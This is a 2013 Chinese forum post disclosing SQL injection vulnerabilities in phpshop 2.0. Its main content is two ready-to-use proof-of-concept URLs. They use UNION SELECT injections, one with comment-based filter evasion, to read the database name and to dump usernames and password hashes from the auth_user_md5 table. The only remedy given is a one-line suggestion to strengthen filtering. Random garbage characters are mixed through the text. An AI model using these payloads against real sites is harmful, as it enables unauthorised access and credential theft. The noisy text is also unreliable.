标题 : phpshop 2.0 SQL Injection Vulnerability
O5 n3 q% |- W* K1 ^7 T( f$ _) i, X- Q8 j
作者 : By onestree' a+ q: s8 k* n( U& i" [6 O
下载地址 : http://code.google.com/p/phpshop/downloads/list
7 H' j6 Q. O3 R/ g6 J测试地址: windows 7 / ubuntu
; O h# g: H: p1 Y2 ]
9 L+ s- C- Y9 Q/ R
: w( D, K1 J% J" {SQLi p0c:
6 Z4 X( O8 N5 r& s U5 D' j& j
3 q' X0 K: `7 Q4 _==================
" [. x, s: ?- g& S) Z: ]
Z0 k! f( z/ ?3 [# Khttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'( i; r" F$ E: S0 F; ^8 E
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
! f$ J9 @2 J( H$ ^
5 y& [" _& u' {7 dhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
* F$ w) \: T4 ]! g5 G: n) [7 B
' Y$ E. H% Q& \- w/ l7 K修复:* k6 P$ a" T1 r0 ?1 Y2 |; O& ?
加强过滤
& T$ O1 ]& [' G8 U
& W- n: Z- }- l, w" Z
0 W, ?/ C h5 F4 ?2 e) n) P |
发表于 2013-1-18 18:24:10
收藏
支持
反对